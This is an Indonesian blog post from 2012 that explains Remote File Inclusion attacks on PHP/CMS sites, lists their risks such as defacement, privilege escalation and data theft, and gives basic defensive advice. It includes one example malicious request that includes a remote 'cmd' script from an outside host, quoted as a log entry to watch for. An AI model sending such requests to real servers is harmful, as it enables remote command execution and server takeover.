5/29/2018 Pengertian RFI ( Remote File Inclusion )

7th July 2012 Pengertian RFI ( Remote File Inclusion )

Remote file inclusion

dapat diartikan sebagai penyisipan sebuah file dari luar suatu file dalam sebuah webserver dengan tujuan script didalam akan dieksekusi pada saat file

yang disisipi di-load. Tehnik ini sendiri mengharuskan webserver yang bersangkutan mampu menjalankan server side scripting (PHP, ASP, etc) serta

file yang disisipi dibuat menggunakan bahasa script tersebut.

Target remote file inclusion biasanya berbentuk sebuah portal atau content management system (CMS) sehingga banyak sekali jumlah

website yang rawan terhadap serangan tipe ini.

Sebuah serangan file inclusion terjadi didasarkan pada kesalahan atau ketidaksengajaan pendeklarasian variabel-variabel dalam sebuah file. Sebuah

variabel yang tidak dideklarasikan atau didefinisikan secara benar dapat di eksploitasi.

Resiko yang dihadapi

File inclusion memiliki level resiko tinggi (High Risk) bahkan level sangat berbahaya(Very Dangerous) karena injeksi memperkenankan pelakunya

untuk melakukan eksekusi perintah jarak jauh (Remote Commands Execution) terhadap server.

Tindakan ini sangat membahayakan bagi sebuah server jika pelakunya mencoba untuk mendapatkan hak akses lebih tinggi dengan cara melakukan

eksploitasi lokal, sehingga bisa saja pelaku mendapatkan akses administrator atau root.

Secara garis besar resiko serangan ini adalah:

1. Web root folder / subdirectory defacing.

2. Previledge escalation (mendapatkan hak akses lebih tinggi).

3. Menjalankan proses dalam server (psyBNC, bots, dsb)

4. Pilfering a.k.a pencurian data (such as credentials information, credit cards, dll..)

5. Dan banyak lagi…!!! Termasuk tindakan pengambilalihan server dan DDoS.

Hal-hal yang perlu diketahui untuk menghindari serangan RFI

Banyak sekali portal dan komunitas white hat yang sering merilis bugs terbaru seputar injeksi. Cara paling aman adalah selalu memperhatikan

perkembangan yang mereka lakukan sehingga anda dapat melakukan sedikit perbaikan yang berarti terhadap CMS yang mungkin sekarang anda

gunakan. Selalu perhatikan raw log yang biasanya terdapat pada layanan hosting anda. Jika terdapat fetching yang agak menyimpang seperti

GET /index.php?page=http://www.injek-pake-kaki.net/cmd? anda wajib curiga,

karena bisa saja ini serangan terhadap web atau portal yang anda kelola.

Salah satu tehnik paling aman bagi seorang administrator adalah selalu memperhatikan usaha-usaha infiltrasi dan usaha eksploitasi lokal. Gunakan

http://secret-coder.blogspot.co.id/2012/07/belajar-deface-dengan-tehnik-rfi.html 1/2
5/29/2018 Pengertian RFI ( Remote File Inclusion )

firewall guna mencegah penyusupan orang-orang yang tidak bertanggung jawab dan memperhatikan port-port server yang sedang terbuka.

Diposting 7th July 2012 oleh Ali Iskandar

Label: Hacking

Lihat komentar

http://secret-coder.blogspot.co.id/2012/07/belajar-deface-dengan-tehnik-rfi.html 2/2